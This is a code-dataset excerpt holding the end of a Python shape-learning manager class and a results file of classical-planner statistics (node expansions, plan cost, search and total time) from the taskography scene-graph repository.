except ValueError: #unknown shape
shapeType_index = -1
return shapeType_index
def indexOfShapeInAllShapesLearnt(self, shapeType):
try:
shapeType_index = self.shapesLearnt.index(shapeType)
except ValueError: #unknown shape
shapeType_index = -1
return shapeType_index
def shapeAtIndexInCurrentCollection(self, shapeType_index):
try:
shapeType = self.currentCollection[shapeType_index]
        except IndexError:  # unknown shape index
shapeType = -1
return shapeType
def shapeAtIndexInAllShapesLearnt(self, shapeType_index):
try:
shapeType = self.shapesLearnt[shapeType_index]
        except IndexError:  # unknown shape index
shapeType = -1
return shapeType
def shapesOfCurrentCollection(self):
shapes = []
for idx, shape_learner in enumerate(self.shapeLearners_currentCollection):
path, paramValues = shape_learner.getLearnedShape()
paramsToVary = shape_learner.paramsToVary
shapeName = self.shapeAtIndexInCurrentCollection(idx)
code = self.indexOfShapeInAllShapesLearnt(shapeName)
shape = Shape(path=path,
shapeID=[],
shapeType=shapeName,
shapeType_code=code,
paramsToVary=paramsToVary,
paramValues=paramValues)
shapes.append(shape)
return shapes
def newCollection(self, collection):
self.currentCollection = ""
# check, for each letter, that we have the corresponding dataset
for l in collection:
try:
self.generateSettings(l)
except RuntimeError:
# no dataset for this letter!
shapeLogger.error("No dataset available for letter <%s>. Skipping this letter." % l)
continue
self.currentCollection += l
self.nextShapeLearnerToBeStarted = 0
shapeLogger.info("Starting to work on word <%s>" % collection)
try:
self.collectionsLearnt.index(self.currentCollection)
collectionSeenBefore = True
except ValueError:
collectionSeenBefore = False
self.collectionsLearnt.append(self.currentCollection)
self.initialiseShapeLearners()
return collectionSeenBefore
def resetParameterBounds(self, shapeType_index):
currentBounds = self.shapeLearners_currentCollection[shapeType_index].getParameterBounds()
#change bounds back to the initial ones
newBounds = self.shapeLearners_currentCollection[shapeType_index].initialBounds
self.shapeLearners_currentCollection[shapeType_index].setParameterBounds(newBounds)
shapeLogger.debug('Changing bounds on shape ' + self.shapeAtIndexInCurrentCollection(shapeType_index) + ' from ' + str(
currentBounds) + ' to ' + str(newBounds))
def generateSimulatedFeedback(self, shapeType_index, newShape, newParamValue):
return self.shapeLearners_currentCollection[shapeType_index].generateSimulatedFeedback(newShape, newParamValue)
def save_all(self, shapeIndex_messageFor):
shape_messageFor = self.shapeAtIndexInAllShapesLearnt(shapeIndex_messageFor)
        if shape_messageFor == -1:
            shapeLogger.warning('Ignoring save request because not for valid shape type')
            return -1
else:
self.shapeLearners_currentCollection[shapeIndex_messageFor].save_all()
def save_demo(self, shapeIndex_messageFor):
shape_messageFor = self.shapeAtIndexInAllShapesLearnt(shapeIndex_messageFor)
        if shape_messageFor == -1:
            shapeLogger.warning('Ignoring demonstration save because not for valid shape type')
            return -1
else:
self.shapeLearners_currentCollection[shapeIndex_messageFor].save_demo()
def save_params(self, shapeIndex_messageFor):
shape_messageFor = self.shapeAtIndexInAllShapesLearnt(shapeIndex_messageFor)
        if shape_messageFor == -1:
            shapeLogger.warning('Ignoring save request because not for valid shape type')
            return -1
else:
self.shapeLearners_currentCollection[shapeIndex_messageFor].save_params()
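# Hypothetical usage sketch, not part of the original module: wiring a
# ShapeLearnerManager to a caller-supplied settings factory and starting work
# on a word. `generate_settings_for_letter` is an assumed placeholder for
# whatever function the caller uses to build ShapeLearner settings per letter.
def example_session(generate_settings_for_letter):
    manager = ShapeLearnerManager(generate_settings_for_letter, "shapes.log")
    manager.newCollection("cat")                   # letters without a dataset are skipped
    first_shape = manager.startNextShapeLearner()  # Shape recordtype for the first letter
    return first_shape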
| 45.857678
| 167
| 0.669797
|
0107de134100c76d2b0ef4d22f40669dbeb4ff06
| 11,276
|
py
|
Python
|
scenegraph/exp-official/taskographyv2medium1_DecStar-agl-fb/taskographyv2medium1_DecStar-agl-fb_test.py
|
taskography/3dscenegraph-dev
|
2c261241230fbea1f1c687ff793478248f25c02c
|
[
"MIT"
] | 1
|
2022-01-30T22:06:57.000Z
|
2022-01-30T22:06:57.000Z
|
scenegraph/exp-official/taskographyv2medium1_DecStar-agl-fb/taskographyv2medium1_DecStar-agl-fb_test.py
|
taskography/3dscenegraph-dev
|
2c261241230fbea1f1c687ff793478248f25c02c
|
[
"MIT"
] | null | null | null |
scenegraph/exp-official/taskographyv2medium1_DecStar-agl-fb/taskographyv2medium1_DecStar-agl-fb_test.py
|
taskography/3dscenegraph-dev
|
2c261241230fbea1f1c687ff793478248f25c02c
|
[
"MIT"
] | null | null | null |
STATS = [
{
"num_node_expansions": 24,
"plan_cost": 20,
"plan_length": 20,
"search_time": 0.8,
"total_time": 1.81
},
{
"num_node_expansions": 22,
"plan_cost": 18,
"plan_length": 18,
"search_time": 0.73,
"total_time": 1.72
},
{
"num_node_expansions": 19,
"plan_cost": 17,
"plan_length": 17,
"search_time": 0.59,
"total_time": 1.54
},
{
"num_node_expansions": 15,
"plan_cost": 12,
"plan_length": 12,
"search_time": 0.54,
"total_time": 1.29
},
{
"num_node_expansions": 18,
"plan_cost": 15,
"plan_length": 15,
"search_time": 0.75,
"total_time": 1.67
},
{
"num_node_expansions": 12,
"plan_cost": 10,
"plan_length": 10,
"search_time": 0.87,
"total_time": 1.86
},
{
"num_node_expansions": 18,
"plan_cost": 16,
"plan_length": 16,
"search_time": 1.27,
"total_time": 3.09
},
{
"num_node_expansions": 15,
"plan_cost": 13,
"plan_length": 13,
"search_time": 1.36,
"total_time": 3.6
},
{
"num_node_expansions": 27,
"plan_cost": 23,
"plan_length": 23,
"search_time": 0.68,
"total_time": 1.74
},
{
"num_node_expansions": 31,
"plan_cost": 27,
"plan_length": 27,
"search_time": 0.61,
"total_time": 1.27
},
{
"num_node_expansions": 28,
"plan_cost": 24,
"plan_length": 24,
"search_time": 0.94,
"total_time": 2.6
},
{
"num_node_expansions": 18,
"plan_cost": 16,
"plan_length": 16,
"search_time": 0.75,
"total_time": 1.95
},
{
"num_node_expansions": 13,
"plan_cost": 11,
"plan_length": 11,
"search_time": 0.21,
"total_time": 0.47
},
{
"num_node_expansions": 19,
"plan_cost": 16,
"plan_length": 16,
"search_time": 0.23,
"total_time": 0.5
},
{
"num_node_expansions": 24,
"plan_cost": 19,
"plan_length": 19,
"search_time": 1.98,
"total_time": 4.66
},
{
"num_node_expansions": 21,
"plan_cost": 19,
"plan_length": 19,
"search_time": 1.47,
"total_time": 4.19
},
{
"num_node_expansions": 17,
"plan_cost": 14,
"plan_length": 14,
"search_time": 1.29,
"total_time": 3.99
},
{
"num_node_expansions": 23,
"plan_cost": 20,
"plan_length": 20,
"search_time": 1.45,
"total_time": 4.32
},
{
"num_node_expansions": 10,
"plan_cost": 8,
"plan_length": 8,
"search_time": 0.58,
"total_time": 1.46
},
{
"num_node_expansions": 17,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.54,
"total_time": 1.32
},
{
"num_node_expansions": 15,
"plan_cost": 13,
"plan_length": 13,
"search_time": 0.24,
"total_time": 0.63
},
{
"num_node_expansions": 25,
"plan_cost": 19,
"plan_length": 19,
"search_time": 0.24,
"total_time": 0.62
},
{
"num_node_expansions": 14,
"plan_cost": 11,
"plan_length": 11,
"search_time": 1.44,
"total_time": 4.23
},
{
"num_node_expansions": 31,
"plan_cost": 24,
"plan_length": 24,
"search_time": 1.97,
"total_time": 4.85
},
{
"num_node_expansions": 18,
"plan_cost": 16,
"plan_length": 16,
"search_time": 2.34,
"total_time": 7.02
},
{
"num_node_expansions": 18,
"plan_cost": 13,
"plan_length": 13,
"search_time": 2.5,
"total_time": 6.92
},
{
"num_node_expansions": 17,
"plan_cost": 14,
"plan_length": 14,
"search_time": 1.01,
"total_time": 2.56
},
{
"num_node_expansions": 28,
"plan_cost": 21,
"plan_length": 21,
"search_time": 0.98,
"total_time": 2.43
},
{
"num_node_expansions": 15,
"plan_cost": 13,
"plan_length": 13,
"search_time": 0.03,
"total_time": 0.12
},
{
"num_node_expansions": 13,
"plan_cost": 10,
"plan_length": 10,
"search_time": 0.03,
"total_time": 0.11
},
{
"num_node_expansions": 13,
"plan_cost": 11,
"plan_length": 11,
"search_time": 0.11,
"total_time": 0.29
},
{
"num_node_expansions": 20,
"plan_cost": 18,
"plan_length": 18,
"search_time": 0.1,
"total_time": 0.28
},
{
"num_node_expansions": 13,
"plan_cost": 10,
"plan_length": 10,
"search_time": 0.85,
"total_time": 2.07
},
{
"num_node_expansions": 17,
"plan_cost": 15,
"plan_length": 15,
"search_time": 0.99,
"total_time": 2.53
},
{
"num_node_expansions": 16,
"plan_cost": 12,
"plan_length": 12,
"search_time": 0.89,
"total_time": 2.2
},
{
"num_node_expansions": 14,
"plan_cost": 10,
"plan_length": 10,
"search_time": 0.76,
"total_time": 1.88
},
{
"num_node_expansions": 19,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.29,
"total_time": 0.63
},
{
"num_node_expansions": 17,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.28,
"total_time": 0.62
},
{
"num_node_expansions": 9,
"plan_cost": 7,
"plan_length": 7,
"search_time": 0.13,
"total_time": 0.33
},
{
"num_node_expansions": 9,
"plan_cost": 7,
"plan_length": 7,
"search_time": 0.13,
"total_time": 0.35
},
{
"num_node_expansions": 14,
"plan_cost": 11,
"plan_length": 11,
"search_time": 0.69,
"total_time": 1.85
},
{
"num_node_expansions": 19,
"plan_cost": 15,
"plan_length": 15,
"search_time": 0.59,
"total_time": 1.44
},
{
"num_node_expansions": 20,
"plan_cost": 17,
"plan_length": 17,
"search_time": 2.37,
"total_time": 7.75
},
{
"num_node_expansions": 21,
"plan_cost": 17,
"plan_length": 17,
"search_time": 1.31,
"total_time": 3.64
},
{
"num_node_expansions": 22,
"plan_cost": 17,
"plan_length": 17,
"search_time": 1.23,
"total_time": 3.3
},
{
"num_node_expansions": 21,
"plan_cost": 17,
"plan_length": 17,
"search_time": 0.12,
"total_time": 0.29
},
{
"num_node_expansions": 22,
"plan_cost": 20,
"plan_length": 20,
"search_time": 0.11,
"total_time": 0.28
},
{
"num_node_expansions": 26,
"plan_cost": 20,
"plan_length": 20,
"search_time": 2.96,
"total_time": 7.54
},
{
"num_node_expansions": 16,
"plan_cost": 12,
"plan_length": 12,
"search_time": 0.54,
"total_time": 1.39
},
{
"num_node_expansions": 25,
"plan_cost": 19,
"plan_length": 19,
"search_time": 0.55,
"total_time": 1.42
},
{
"num_node_expansions": 16,
"plan_cost": 12,
"plan_length": 12,
"search_time": 0.09,
"total_time": 0.23
},
{
"num_node_expansions": 16,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.09,
"total_time": 0.23
},
{
"num_node_expansions": 21,
"plan_cost": 19,
"plan_length": 19,
"search_time": 0.23,
"total_time": 0.55
},
{
"num_node_expansions": 23,
"plan_cost": 17,
"plan_length": 17,
"search_time": 0.27,
"total_time": 0.57
},
{
"num_node_expansions": 13,
"plan_cost": 10,
"plan_length": 10,
"search_time": 1.89,
"total_time": 5.64
},
{
"num_node_expansions": 17,
"plan_cost": 13,
"plan_length": 13,
"search_time": 1.65,
"total_time": 5.2
},
{
"num_node_expansions": 24,
"plan_cost": 19,
"plan_length": 19,
"search_time": 1.21,
"total_time": 2.68
},
{
"num_node_expansions": 21,
"plan_cost": 18,
"plan_length": 18,
"search_time": 1.18,
"total_time": 2.87
},
{
"num_node_expansions": 15,
"plan_cost": 12,
"plan_length": 12,
"search_time": 0.68,
"total_time": 1.55
},
{
"num_node_expansions": 11,
"plan_cost": 8,
"plan_length": 8,
"search_time": 0.62,
"total_time": 1.29
},
{
"num_node_expansions": 20,
"plan_cost": 18,
"plan_length": 18,
"search_time": 0.13,
"total_time": 0.32
},
{
"num_node_expansions": 27,
"plan_cost": 23,
"plan_length": 23,
"search_time": 0.13,
"total_time": 0.33
},
{
"num_node_expansions": 15,
"plan_cost": 12,
"plan_length": 12,
"search_time": 1.09,
"total_time": 3.19
},
{
"num_node_expansions": 16,
"plan_cost": 12,
"plan_length": 12,
"search_time": 1.37,
"total_time": 3.65
},
{
"num_node_expansions": 20,
"plan_cost": 16,
"plan_length": 16,
"search_time": 0.8,
"total_time": 2.01
},
{
"num_node_expansions": 26,
"plan_cost": 19,
"plan_length": 19,
"search_time": 0.8,
"total_time": 1.88
},
{
"num_node_expansions": 18,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.65,
"total_time": 1.74
},
{
"num_node_expansions": 16,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.63,
"total_time": 1.67
},
{
"num_node_expansions": 29,
"plan_cost": 27,
"plan_length": 27,
"search_time": 0.82,
"total_time": 2.2
},
{
"num_node_expansions": 18,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.71,
"total_time": 2.03
},
{
"num_node_expansions": 14,
"plan_cost": 12,
"plan_length": 12,
"search_time": 0.09,
"total_time": 0.24
},
{
"num_node_expansions": 17,
"plan_cost": 14,
"plan_length": 14,
"search_time": 0.07,
"total_time": 0.23
}
]
num_timeouts = 0
num_problems = 172
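# Hypothetical helper, not part of the original results file: summarizes the
# STATS records above into per-field means (e.g. average plan length and
# average total planning time over the recorded problems).
def summarize_stats(stats=STATS):
    count = len(stats)
    fields = ("num_node_expansions", "plan_cost", "plan_length", "search_time", "total_time")
    return {field: sum(entry[field] for entry in stats) / count for field in fields}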
| 22.109804
| 34
| 0.462043
|